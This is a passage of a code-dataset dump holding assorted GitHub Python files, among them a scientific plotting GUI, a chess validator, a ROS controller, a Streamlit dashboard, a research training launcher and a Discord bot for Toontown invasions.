ax.set_yscale(\"log\")\n ax.set_ylabel(\"Reff [um]\")\n ax.set_xlabel(\"Energy [eV]\")\n return df\n\n\ndef sweep_and_plot_xrt(xrt_lens, num_steps=100):\n RE(\n transfocate.checkout.sweep_energy_plan(\n tfs, checkout, xrt_lens, num_steps=num_steps\n ),\n LiveTable(fields),\n )\n\n xrt_radius = plot_sweep_energy(xrt_lens, db[-1])\n fn = f\"pre_focus_{xrt_radius:.0f}um_lens_{xrt_lens}\"\n plt.savefig(f\"{fn}.png\")\n plt.savefig(f\"{fn}.pdf\")\n df = db[-1].table()[fields]\n df.to_excel(f\"{fn}.xlsx\")\n\n\ndef sweep_and_plot_xrt_all(num_steps):\n for lens_idx in [0, 1, 2, 3]:\n sweep_and_plot_xrt(lens_idx, num_steps=num_steps)\n\n plot_sweeps()\n\n\nif __name__ == \"__main__\":\n plt.ion()\n tfs = transfocate.Transfocator(\"MFX:LENS\", name=\"tfs\")\n checkout = transfocate.checkout.LensInterlockCheckout(\"MFX:LENS\", name=\"checkout\")\n db = databroker.Broker.named(\"temp\")\n RE = bluesky.RunEngine({})\n RE.subscribe(db.insert)\n tfs.interlock.limits.low.name = \"trip_low\"\n tfs.interlock.limits.high.name = \"trip_high\"\n tfs.interlock.faulted.name = \"faulted\"\n tfs.interlock.state_fault.name = \"state_fault\"\n tfs.interlock.violated_fault.name = \"violated\"\n tfs.interlock.min_fault.name = \"min_fault\"\n tfs.interlock.lens_required_fault.name = \"lens_required_fault\"\n tfs.interlock.table_fault.name = \"table_fault\"\n checkout.energy.name = \"energy\"\n tfs.tfs_radius.name = \"tfs_radius\"\n tfs.xrt_radius.name = \"xrt_radius\"\n\n print(\"Connecting to devices...\")\n\n try:\n time.sleep(2)\n tfs.wait_for_connection(timeout=5.0)\n checkout.wait_for_connection(timeout=5.0)\n except Exception as ex:\n print(\n \"\"\"\nSorry, trouble connecting to some devices. 
This happens occasionally at initialization.\nPlease re-try running this script.\n\"\"\"\n        )\n        raise ex\n\n    print(DESCRIPTION)\n    print(\"Run scans and generate report? ('yes' to continue)\")\n    if input().lower() == \"yes\":\n        print(\"Number of data points? Default: 50\")\n        try:\n            num_points = int(input().strip())\n        except Exception:\n            num_points = 50\n\n        print(f\"Scanning with num_points={num_points}...\")\n        sweep_and_plot_xrt_all(num_points)\n        print(\"Generating report...\")\n        generate_report()\n    else:\n        print(\"Manual mode.\")\n","repo_name":"pcdshub/transfocate","sub_path":"transfocate/automated_checkout.py","file_name":"automated_checkout.py","file_ext":"py","file_size_in_byte":8484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30496450189","text":"class Solution(object):\r\n    def imageSmoother(self, M):\r\n        \"\"\"\r\n        :type M: List[List[int]]\r\n        :rtype: List[List[int]]\r\n        \"\"\"\r\n        ret = []\r\n        directions = [(-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1), (1, 0), (1, 1)]\r\n        for i in range(0, len(M)):\r\n            ret.append([])\r\n            for j in range(0, len(M[0])):\r\n                surrounding_sum = M[i][j]\r\n                cnt = 1\r\n                for di, dj in directions:\r\n                    new_i, new_j = i+di, j+dj\r\n                    if (0 <= new_i < len(M)) and (0 <= new_j < len(M[0])):\r\n                        surrounding_sum += M[new_i][new_j]\r\n                        cnt += 1\r\n                ret[i].append(surrounding_sum // cnt)\r\n        \r\n        return ret","repo_name":"ycchhueannu/LeetCode","sub_path":"python/0661_Image_Smoother.py","file_name":"0661_Image_Smoother.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24324888028","text":"#!/usr/bin/env python3\nfrom move_validation.base_move_validation_step import BaseMoveValidationStep\nfrom literals import INVALID_MOVE_MESSAGES as invalid_msg\n\n\nclass ValidatePiece(BaseMoveValidationStep):\n    \"\"\"\n    Check move against piece.valid_moves\n    \"\"\"\n\n\n    def perform_check(self):\n        \"\"\"\n        Performs the check and sets up is_valid and invalid_reason properties\n        :return: None\n        \"\"\"\n        if self.move_obj.move in [move[:2] for move in self.move_obj.piece.valid_moves]:\n            self._is_valid = True\n        else:\n            self._invalid_reason = invalid_msg['piece']\n","repo_name":"Prosserc/python_chess","sub_path":"move_validation/validate_piece.py","file_name":"validate_piece.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"15534796619","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport cv2, random, math\nfrom numpy import angle\nimport rospy, rospkg\nimport numpy as np\nfrom std_msgs.msg import Float64\nfrom TLight_revise import TLight\n\n\nclass Kookmin(object):\n\n    def __init__(self) :\n        self.rate = rospy.Rate(10)\n        self.pubEgo_speed = rospy.Publisher(\"/commands/motor/speed\", Float64, queue_size=10)\n        self.pubEgo_angle = rospy.Publisher(\"/commands/servo/position\", Float64, queue_size=10)\n        self.tlight = TLight()\n\n\n    def control(self) :\n\n        self.tlight.detect() # update status from the traffic light signal\n\n        if self.tlight.status < 2:\n            custom_Ego_speed = 100.0\n            custom_Ego_position = 0\n        elif self.tlight.status == 2:\n            custom_Ego_speed = 0\n            custom_Ego_position = 0\n\n        self.pubEgo_speed.publish(custom_Ego_speed)\n        self.pubEgo_angle.publish(custom_Ego_position)\n\n        
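# sleep to honor the 10 Hz loop rate set in __init__\n        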
self.rate.sleep()\n","repo_name":"Chokoty/kookmin_autopilot","sub_path":"kookmin/scripts/kookmin_tlight.py","file_name":"kookmin_tlight.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21242847592","text":"\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('order', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='order',\n            name='status',\n            field=models.IntegerField(choices=[(0, 'Accepted'), (1, 'Completed'), (2, 'Canceled'), (3, 'Deleted')], default=0),\n        ),\n    ]\n","repo_name":"Amankaium/plovo","sub_path":"order/migrations/0002_alter_order_status.py","file_name":"0002_alter_order_status.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"9665445263","text":"# Singly linked list implementation (note: despite the file name, no numpy is needed).\n# A linked list is structured like a chain, which makes it different from an array.\n# Linked lists have benefits such as flexible memory allocation, easy insertion, and easy deletion.\n# First we create a node (a block of memory).\n\n# The structure of a linked list looks like:-\n    # NodeA->NodeB->NodeC->NodeD->NodeE\n\nclass List:\n    def __init__(self,num):\n        self.data=num\n        self.address=None\n\n# Then we link each node to the other nodes.\nclass linkedList:\n    def __init__(self):\n        self.head=None\n\n# Now we create the nodes.\n    def create(self,num):\n        newNode=List(num) # This line is important: it allocates a new node (List) and stores the data in it.\n        if self.head is None:\n            self.head=newNode\n            self.last=newNode\n        else:\n            self.last.address=newNode\n            self.last=newNode\n    def printList(self):\n        temp=self.head\n        while temp is not None:\n            print(temp.data)\n            temp=temp.address\n\n# Exercise the classes.\noop=linkedList()\noop.create(int(input(\"Enter a number: \")))\noop.create(int(input(\"Enter another number: \")))\nprint(\"Output:-\")\noop.printList()\n\n","repo_name":"aYgCOO/DSA-In-PY","sub_path":"DSA/Linear/Dynamic/Linked_list/linkedlist_using_numpy.py","file_name":"linkedlist_using_numpy.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12928799937","text":"import argparse\nimport json\nimport os\nimport sys\n\n\ndef main():\n    parser = argparse.ArgumentParser(\n        'Merges sources of a Dart target and its dependencies',\n        fromfile_prefix_chars='@'\n    )\n    parser.add_argument(\n        '--output',\n        help='Path to output the final list',\n        type=argparse.FileType('w'),\n        required=True\n    )\n    parser.add_argument(\n        '--depfile',\n        help='Path to the depfile to generate',\n        type=argparse.FileType('w'),\n        required=True\n    )\n    parser.add_argument(\n        '--sources',\n        help='Sources of this target',\n        nargs='*',\n    )\n    parser.add_argument(\n        '--source_lists',\n        help='Files containing lists of Dart sources',\n        nargs='*'\n    )\n    args = parser.parse_args()\n\n    args.depfile.write(\n        '{}: {}\\n'.format(args.output.name, ' '.join(args.source_lists))\n    )\n\n    # Merges sources of this target, and all of its dependencies.\n    all_sources = set(args.sources)\n    for f in args.source_lists:\n        with open(f, 'r') as f:\n            all_sources.update(json.load(f))\n    json.dump(sorted(all_sources), args.output)\n\n\nif __name__ == '__main__':\n    
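# exit with main()'s return code so build tooling can detect failure\n    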
sys.exit(main())\n","repo_name":"flutter/engine","sub_path":"tools/fuchsia/dart/merge_deps_sources.py","file_name":"merge_deps_sources.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":6866,"dataset":"github-code","pt":"37"} +{"seq_id":"30844667931","text":"import streamlit as st\r\nfrom PIL import Image\r\n\r\nst.set_page_config(page_title='Home', page_icon='')\r\n\r\nimage = Image.open('image_delivery.jpg')\r\n\r\nst.sidebar.image(image, width=150)\r\n\r\nst.sidebar.markdown('# Fome Zero')\r\nst.sidebar.markdown('## Restaurant Delivery')\r\nst.sidebar.markdown(\"\"\"___\"\"\")\r\n\r\nst.write('# Fome Zero Dashboard')\r\n\r\nst.markdown(\r\n    \"\"\"\r\n    The Fome Zero Dashboard was built to track the quality, cuisine, and prices of restaurants around the world.\r\n    ### How to use this Dashboard?\r\n    - Country view:\r\n        - TOP 6 - Number of restaurants registered per country.\r\n        - TOP 6 - Number of cities registered per country.\r\n        - TOP 6 - Average number of ratings per country.\r\n        - TOP 6 - Average price of a dish for two people per country.\r\n\r\n    - City view:\r\n        - Top 10 cities with the most restaurants.\r\n        - Top 7 cities with restaurants whose average rating is above 4.\r\n        - Top 7 cities with restaurants whose average rating is below 2.5.\r\n        - Top 10 cities with restaurants offering distinct cuisine types.\r\n\r\n    - Cuisines view:\r\n        - Top 10 restaurants.\r\n        - Top 10 best cuisine types.\r\n        - Top 10 worst cuisine types.\r\n    ### Ask for help\r\n    - Data Science team on Discord\r\n        - ricardo_ninomiya#2135\r\n\r\n    \"\"\"\r\n\r\n)","repo_name":"ricardoninomiya/ftc_fome_zero","sub_path":"Home.py","file_name":"Home.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3030708216","text":"import torch\nimport argparse\nfrom models import Resnet50\nfrom utils import make_dir_if_not_exist, setup_seed\nfrom gen_attack import train_generator, Generator\n\ntorch.backends.cudnn.enabled = True\ntorch.backends.cudnn.benchmark = True\n\n\ndef parse_args():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--exp_name\", help=\"experiment name used to create folder\", default=\"exp_0\")\n    parser.add_argument(\"--batch_size\", help=\"batch size for training\", default=24, type=int)\n    parser.add_argument(\"--epochs\", help=\"epochs for training\", default=30, type=int)\n    parser.add_argument(\"--device\", help=\"which device to use\", default=\"cuda:0\")\n    parser.add_argument(\"--seed\", help=\"random seeds for experiments\", default=1225, type=int)\n    return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n    args = parse_args()\n    record_dir = f\"./data/train_generator/{args.exp_name}/\"\n    make_dir_if_not_exist(record_dir)\n\n    setup_seed(args.seed)\n    resnet50 = Resnet50(pool=False)\n    generator = Generator()\n\n    train_generator(record_dir,\n                    args.batch_size,\n                    args.epochs,\n                    generator,\n                    resnet50,\n                    args.device)\n\n    print(f\"finish training, see result in {record_dir}\")\n","repo_name":"pigeon-dove/FGLA","sub_path":"train_generator.py","file_name":"train_generator.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"73797720748","text":"from .font_constants import FONT_ARRAY\nfrom PIL import ImageFont\nfrom typing import List, Dict, Union\nfrom textwrap import wrap\nimport spacy\n\n
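# a blank multilingual (\"xx\") pipeline with only a sentencizer is enough here;\n# it just needs to split text into sentences, no trained model required\n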
nlp = spacy.blank(\"xx\")\nnlp.add_pipe('sentencizer')\n\ntry:\n    from fontTools.ttLib import TTFont\nexcept ImportError:\n    from fonttools.ttLib import TTFont\n\ndef get_text_width(text, font_size = 15, font = None):\n    if font is None:\n        font = get_best_font(text, FONT_ARRAY)\n    font_path = font['path']\n    font_obj = ImageFont.truetype(font_path, font_size)\n    return font_obj.getlength(text)\n\ndef get_font_score(font, text):\n    font_path = font['path']\n    font = TTFont(font_path)\n\n    # We check all chars for presence on the font\n    valid_chars = 0\n    for char in text:\n        # We check if the char is in any table of the font\n        for table in font['cmap'].tables:\n            if ord(char) in table.cmap:\n                valid_chars += 1\n                break\n    return valid_chars\n\ndef get_best_font(text, font_array):\n    best_font = font_array[-1]\n    best_font_points = 0\n    text = text.replace('\\n', '').replace('\\r', '').replace('\\t', '').replace('\\u200B', '')\n    for font in font_array:\n        pts = get_font_score(font, text)\n        if pts > best_font_points:\n            best_font_points = pts\n            best_font = font\n        if best_font_points >= len(text):\n            # every character is covered; no need to keep looking\n            return best_font\n    print(f'WARNING. NO OPTIMAL FONT FOUND, font: {best_font}, font score: {best_font_points}/{len(text)}, text \\\"{text}\\\"\\n')\n    return best_font\n\n\ndef fit_words_within_width(words: Union[list[str], str], font: ImageFont.FreeTypeFont, insert_space: bool):\n    new_text = \"\"\n    space = \" \" if insert_space else \"\"\n    for word in words:\n        last_sentence = new_text.split(\"\\n\")[-1] + word + space\n        if font.getlength(text=last_sentence) >= 240:\n            if new_text.split(\"\\n\")[-1] != \"\":\n                new_text += \"\\n\"\n            new_text += fit_words_within_width(word, font, False) + space\n        else:\n            new_text += word + space\n\n    return new_text\n\ndef split_str_into_newlines(text: str, font_path, font_size):\n    font = ImageFont.truetype(font_path, font_size)\n    words = text.split(\" \")\n    return fit_words_within_width(words, font, True)\n\n\ndef split_with_joined_sentences(text: str):\n    \"\"\"\n    Split text into sentence-sized lines: long sentences are wrapped to at\n    most 85 characters, and adjacent short sentences are joined when the\n    pair still fits within 85 characters.\n    \"\"\"\n    tokens = nlp(text)\n    sentences = [sent.text.strip() for sent in tokens.sents]\n    joined_sentences = []\n    i = 0\n    while i < len(sentences):\n        sentence = sentences[i]\n        if len(sentence) > 85: # Long sentences should be wrapped to multiple shorter lines\n            text_chunks = [chunk for chunk in wrap(sentence, 85)]\n            joined_sentences = [*joined_sentences, *text_chunks]\n            i += 1\n        else:\n            if i + 1 < len(sentences) and len(f\"{sentence} {sentences[i+1]}\") <= 85: # Maybe we can join two different sentences\n                joined_sentences.append(sentence + \" \" + sentences[i+1])\n                i += 2\n            else:\n                joined_sentences.append(sentence)\n                i += 1\n\n    return joined_sentences","repo_name":"LuisMayo/objection_engine","sub_path":"objection_engine/font_tools.py","file_name":"font_tools.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"37"} +{"seq_id":"6374106461","text":"# GUI used for quickly plotting BOSS spectra. Also allows overplotting of best-fit template as\n# determined by redmonster pipeline. 
Sort of a redmonster version of plotspec.pro, though currently\n# with less bells and whistles.\n#\n# Tim Hutchinson, University of Utah, April 2014\n# Significantly updated by TH, October 2014\n#\n# thutchinson@utah.edu\n\nfrom os import environ\nfrom os.path import join, exists\ntry:\n    from tkinter import *\nexcept ImportError:\n    from Tkinter import *\nimport numpy as n\nimport matplotlib\nmatplotlib.use('Agg')\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, \\\nNavigationToolbar2TkAgg\nfrom matplotlib.figure import Figure\nfrom astropy.io import fits\nfrom astropy.convolution import convolve, Box1DKernel\nimport seaborn as sns\nsns.set_style('whitegrid')\n\nfrom redmonster.physics.misc import poly_array\n\n\nclass PlotFit(Frame):\n    def __init__ (self):\n        self.root = Tk()\n        self.ablinelist = [\n            3890.2, 3933.7, 3968.5, 4102.9, 4307, 4341.7, 4862.7,\n            5175, 5889, 5895\n        ]\n        self.ablinenames = [\n            r'H$\\epsilon$','Ca K', 'Ca H', r'H$\\delta$', 'Ca G',\n            r'H$\\gamma$', r'H$\\beta$', 'Mg I', 'Na I', 'Na I'\n        ]\n        self.emlinelist = [2500]\n        self.emlinenames = ['test emline']\n        self.plate = None\n        self.mjd = None\n        #\n        plate = StringVar()\n        plate.set('7848')\n        mjd = StringVar()\n        mjd.set('56959')\n        #\n        L1 = Label(self.root, text='Plate')\n        L1.grid(sticky=E)\n        L2 = Label(self.root, text='MJD')\n        L2.grid(sticky=E)\n        L3 = Label(self.root, text='Fiber')\n        L3.grid(sticky=E)\n        L5 = Label(self.root, text='z num')\n        L5.grid(sticky=E)\n        self.e1 = Entry(self.root, textvariable=plate)\n        self.e1.bind()\n        self.e1.grid(row=0, column=1)\n        self.e2 = Entry(self.root, textvariable=mjd)\n        self.e2.grid(row=1, column=1)\n        fiber = StringVar()\n        fiber.set('0')\n        self.e3 = Entry(self.root, textvariable=fiber)\n        self.e3.grid(row=2, column=1)\n        znum = StringVar()\n        znum.set('1')\n        self.e5 = Entry(self.root, textvariable=znum)\n        self.e5.grid(row=3, column=1)\n        nextz = Button(self.root, text='+', command=self.next_z)\n        nextz.grid(row=3, column=4)\n        prevz = Button(self.root, text='-', command=self.prev_z)\n        prevz.grid(row=3, column=3)\n        self.var = BooleanVar()\n        self.var.set(1)\n        self.restframe = BooleanVar()\n        self.restframe.set(0)\n        self.ablines = BooleanVar()\n        self.ablines.set(0)\n        self.emlines = BooleanVar()\n        self.emlines.set(0)\n        c = Checkbutton(self.root, text='Overplot best-fit model',\n                        variable=self.var)\n        c.grid(row=4, column=1)\n        restframe = Checkbutton(self.root, text='Rest-frame wavelength',\n                                variable=self.restframe)\n        restframe.grid(row=5,column=1)\n        ablines = Checkbutton(self.root, text='Show absorption lines ',\n                              variable=self.ablines)\n        ablines.grid(row=6, column=1)\n        emlines = Checkbutton(self.root, text='Show emission lines ',\n                              variable=self.emlines)\n        emlines.grid(row=7, column=1)\n        #\n        smooth = StringVar()\n        smooth.set('5')\n        L4 = Label(self.root, text='Smooth')\n        L4.grid(sticky=E)\n        self.e4 = Entry(self.root, textvariable=smooth)\n        self.e4.grid(row=8, column=1)\n        plot = Button(self.root, text='Plot', command=self.do_plot)\n        plot.grid(row=9, column=1)\n        qbutton = Button(self.root, text='QUIT', fg='red',\n                         command=self.root.destroy)\n        qbutton.grid(row=10, column=1)\n        nextfiber = Button(self.root, text='>', command=self.next_fiber)\n        nextfiber.grid(row=2, column=4)\n        prevfiber = Button(self.root, text='<', command=self.prev_fiber)\n        prevfiber.grid(row=2, column=3)\n        Frame.__init__(self,self.root)\n        self.root.mainloop()\n\n    def do_plot(self):\n        if self.plate != int(self.e1.get()) or self.mjd != int(self.e2.get()):\n            self.plate = int(self.e1.get())\n            self.mjd = int(self.e2.get())\n            
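# (re)read the spPlate and redmonster files only when plate/mjd change\n            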
self.fiber = int(self.e3.get())\n            self.znum = int(self.e5.get())\n            self.platepath = join(environ['BOSS_SPECTRO_REDUX'],\n                                  environ['RUN2D'], '%s' % self.plate,\n                                  'spPlate-%s-%s.fits' % (self.plate, self.mjd))\n            hdu = fits.open(self.platepath)\n            self.specs = hdu[0].data\n            self.wave = 10**(hdu[0].header['COEFF0'] +\n                             n.arange(hdu[0].header['NAXIS1']) *\n                             hdu[0].header['COEFF1'])\n            # Open the redmonster file once and read every column from it,\n            # instead of re-opening the same file for each quantity.\n            rmhdu = fits.open(join(environ['REDMONSTER_SPECTRO_REDUX'],\n                                   environ['RUN2D'], '%s' % self.plate,\n                                   environ['RUN1D'],\n                                   'redmonster-%s-%s.fits' %\n                                   (self.plate, self.mjd)))\n            self.models = rmhdu[2].data\n            rmdata = rmhdu[1].data\n            self.fiberid = rmdata.FIBERID\n            self.type1 = rmdata.CLASS1\n            self.type2 = rmdata.CLASS2\n            self.type3 = rmdata.CLASS3\n            self.type4 = rmdata.CLASS4\n            self.type5 = rmdata.CLASS5\n            self.z = n.zeros((self.fiberid.shape[0],5))\n            self.z[:,0] = rmdata.Z1\n            self.z[:,1] = rmdata.Z2\n            self.z[:,2] = rmdata.Z3\n            self.z[:,3] = rmdata.Z4\n            self.z[:,4] = rmdata.Z5\n            self.zwarning = rmdata.ZWARNING\n        else:\n            self.fiber = int(self.e3.get())\n            self.znum = int(self.e5.get())\n        f = Figure(figsize=(10,6), dpi=100)\n        a = f.add_subplot(111)\n        loc = n.where(self.fiberid == self.fiber)[0]\n        if len(loc) == 0:\n            # fiber is absent from the redmonster file; placeholders let the\n            # spectrum itself still be plotted below\n            z = 0.0\n            thistype = 'UNKNOWN'\n        elif self.znum == 1:\n            z = self.z[loc[0],0]\n            thistype = self.type1[loc[0]]\n        elif self.znum == 2:\n            z = self.z[loc[0],1]\n            thistype = self.type2[loc[0]]\n        elif self.znum == 3:\n            z = self.z[loc[0],2]\n            thistype = self.type3[loc[0]]\n        elif self.znum == 4:\n            z = self.z[loc[0],3]\n            thistype = self.type4[loc[0]]\n        elif self.znum == 5:\n            z = self.z[loc[0],4]\n            thistype = self.type5[loc[0]]\n        if self.var.get() == 0:\n            
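# raw spectrum only; the best-fit model overlay is skipped\n            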
if self.restframe.get() == 0:\n                a.plot(self.wave, self.specs[self.fiber], color='black')\n            elif self.restframe.get() == 1:\n                a.plot(self.wave/(1+z), self.specs[self.fiber],\n                       color='black')\n        elif self.var.get() == 1:\n            smooth = self.e4.get()\n            if smooth == '':\n                if self.restframe.get() == 0:\n                    a.plot(self.wave, self.specs[self.fiber], color='black')\n                elif self.restframe.get() == 1:\n                    a.plot(self.wave/(1+z), self.specs[self.fiber],\n                           color='black')\n            else:\n                if self.restframe.get() == 0:\n                    a.plot(self.wave, convolve(self.specs[self.fiber],\n                                               Box1DKernel(int(smooth))),\n                           color='black')\n                elif self.restframe.get() == 1:\n                    a.plot(self.wave/(1+z), convolve(self.specs[self.fiber],\n                                                     Box1DKernel(int(smooth))),\n                           color='black')\n            # Overplot model\n            if len(loc) != 0:\n                if self.restframe.get() == 0:\n                    #a.plot(self.wave, self.models[loc[0]], color='black')\n                    # This for when multiple models are in redmonster file\n                    a.plot(self.wave, self.models[loc[0],self.znum-1],\n                           color='cyan')\n                    if self.ablines.get() == 1:\n                        for i, line in enumerate(self.ablinelist):\n                            if ((line*(1+z) > self.wave[0]) &\n                                (line*(1+z) < self.wave[-1])):\n                                a.axvline(line*(1+z), color='blue',\n                                          linestyle='--',\n                                          label=self.ablinenames[i])\n                    if self.emlines.get() == 1:\n                        for i, line in enumerate(self.emlinelist):\n                            if (line*(1+z) > self.wave[0]) & (line*(1+z) < \\\n                                                              self.wave[-1]):\n                                a.axvline(line*(1+z), color='red',\n                                          linestyle='--',\n                                          label=self.emlinenames[i])\n                    if self.ablines.get() == 1 or self.emlines.get() == 1:\n                        a.legend(prop={'size':10})\n                elif self.restframe.get() == 1:\n                    a.plot(self.wave/(1+z), self.models[loc[0],self.znum-1],\n                           color='cyan')\n                    if self.ablines.get() == 1:\n                        for i, line in enumerate(self.ablinelist):\n                            if (line > self.wave[0]) & (line < self.wave[-1]):\n                                a.axvline(line, color='blue', linestyle='--',\n                                          label=self.ablinenames[i])\n                    if self.emlines.get() == 1:\n                        for i, line in enumerate(self.emlinelist):\n                            if (line > self.wave[0]) & (line < self.wave[-1]):\n                                a.axvline(line, color='red', linestyle='--',\n                                          label=self.emlinenames[i])\n                    if self.ablines.get() == 1 or self.emlines.get() == 1:\n                        a.legend(prop={'size':10})\n                a.set_title('Plate %s Fiber %s: z=%s class=%s zwarning=%s' %\n                            (self.plate, self.fiber, z, thistype,\n                             self.zwarning[loc[0]]))\n            else:\n                print('Fiber %s is not in redmonster-%s-%s.fits' % \\\n                      (self.fiber, self.plate, self.mjd))\n                a.set_title('Plate %s Fiber %s' % (self.plate, self.fiber))\n\n        if self.restframe.get() == 1:\n            lower_data, upper_data = self.set_limits()\n            a.axis([self.wave[0]/(1+z)-100,self.wave[-1]/(1+z)+100,\n                    lower_data,upper_data])\n        elif self.restframe.get() == 0:\n            lower_data, upper_data = self.set_limits()\n            a.axis([self.wave[0]-100,self.wave[-1]+100,lower_data,upper_data])\n        a.set_xlabel('Wavelength ($\\AA$)')\n        a.set_ylabel('Flux ($10^{-17} erg\\ cm^2 s^{-1} \\AA^{-1}$)')\n        canvas = FigureCanvasTkAgg(f, master=self.root)\n        canvas.get_tk_widget().grid(row=0, column=5, rowspan=20)\n        toolbar_frame = Frame(self.root)\n        toolbar_frame.grid(row=20,column=5)\n        toolbar = NavigationToolbar2TkAgg( canvas, toolbar_frame )\n        canvas.show()\n\n    def next_fiber(self):\n        self.fiber += 1\n        self.e3.delete(0, END)\n        self.e3.insert(0, str(self.fiber))\n        self.do_plot()\n\n    def prev_fiber(self):\n        self.fiber -= 1\n        self.e3.delete(0, END)\n        self.e3.insert(0, str(self.fiber))\n        self.do_plot()\n\n    def next_z(self):\n        if (self.znum >= 1) & (self.znum < 5):\n            self.znum += 1\n            self.e5.delete(0, END)\n            self.e5.insert(0, str(self.znum))\n            self.do_plot()\n        else:\n            if self.znum < 1:\n                
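# clamp znum back into the valid range [1, 5]\n                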
self.znum = 1\n                self.e5.delete(0, END)\n                self.e5.insert(0, str(self.znum))\n                self.do_plot()\n            elif self.znum >= 5:\n                self.znum = 5\n                self.e5.delete(0, END)\n                self.e5.insert(0, str(self.znum))\n                self.do_plot()\n            else:\n                self.znum = 1\n                self.e5.delete(0, END)\n                self.e5.insert(0, str(self.znum))\n                self.do_plot()\n\n    def prev_z(self):\n        if (self.znum > 1) & (self.znum <= 5):\n            self.znum -= 1\n            self.e5.delete(0, END)\n            self.e5.insert(0, str(self.znum))\n            self.do_plot()\n        else:\n            if self.znum <= 1:\n                self.znum = 1\n                self.e5.delete(0, END)\n                self.e5.insert(0, str(self.znum))\n                self.do_plot()\n            elif self.znum > 5:\n                self.znum = 5\n                self.e5.delete(0, END)\n                self.e5.insert(0, str(self.znum))\n                self.do_plot()\n            else:\n                self.znum = 1\n                self.e5.delete(0, END)\n                self.e5.insert(0, str(self.znum))\n                self.do_plot()\n\n    def set_limits(self, percentile=.95):\n        sorted_flux = n.sort( self.specs[self.fiber] )\n        bottom_ind = int(n.floor((1-percentile)/2. * sorted_flux.shape[0]))\n        # the index must be an integer, and must stay within bounds\n        top_ind = min(int(n.ceil(sorted_flux.shape[0] - bottom_ind)),\n                      sorted_flux.shape[0] - 1)\n        return sorted_flux[bottom_ind], sorted_flux[top_ind]\n\n\n\napp = PlotFit()\n","repo_name":"timahutchinson/redmonster","sub_path":"python/redmonster/tools/plot_fits.py","file_name":"plot_fits.py","file_ext":"py","file_size_in_byte":17358,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"38153734245","text":"# 1. build a submit function\nimport subprocess as sp\ndef submit(optns):\n    sp.call([optns.program, \"-i\", optns.input_name, \"-o\", optns.output_name])\n\n# 2. build an options object\nfrom optavc.options import Options\noptions_kwargs = {\n    'template_file_path': \"template.dat\",\n    'energy_regex'      : r\"@DF-RHF Final Energy:\\s+(-\\d+\\.\\d+)\",\n    'success_regex'     : r\"\\*\\*\\* P[Ss][Ii]4 exiting successfully.\" ,\n    'program'           : \"psi4\",\n    'input_name'        : \"input.dat\",\n    'output_name'       : \"output.dat\",\n    'submitter'         : submit\n}\noptions_obj = Options(**options_kwargs)\n\nfrom optavc.template import TemplateFileProcessor\ntfp = TemplateFileProcessor(open(\"template.dat\").read(), options_obj)\n\nfrom optavc.hessian import Hessian\nimport numpy as np\nhessian_obj = Hessian(tfp.molecule, tfp.input_file_object, options_obj, path=\"HESS\")\nhessian_obj.compute_hessian()\nhess = hessian_obj.get_hessian()\nenrg = hessian_obj.get_reference_energy()\nprint(hess)\nprint(np.array(hess))\nprint(enrg)\n\n","repo_name":"mdav2/optavc","sub_path":"examples/hessian/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"40109980193","text":"# NOQA\nimport discord  # NOQA\nfrom discord.ext import commands\nimport asyncio\nimport requests\nfrom datetime import datetime\n\nurl = 'http://www.toontownrewritten.com/api/invasions'\nloop = asyncio.get_event_loop()\n\n\nclass TTRInv:\n    \"\"\"Check and follow Cog invasions in Toontown Rewritten.\"\"\"\n\n    def __init__(self, bot):\n        \"\"\"Constructor.\"\"\"\n        self.bot = bot\n        loop.call_soon(self.refresh)\n\n    def refresh(self):\n        \"\"\"Re-request the invasion info.\"\"\"\n        try:\n            self.inv_json = requests.get(url)\n            time = datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S')\n            print(\"Invasions refreshed:\", time)\n        except Exception as e:\n            error_msg = \"Encountered {0} while attempting to refresh: {1}\"\n            print(error_msg.format(type(e).__name__, e))\n\n        # await asyncio.sleep(60)\n        if self.bot.get_cog('TTRInv') is not None:\n            loop.call_later(15, self.refresh)\n\n    
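# register \"inv\" as a bot command; its docstring doubles as the help text\n    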
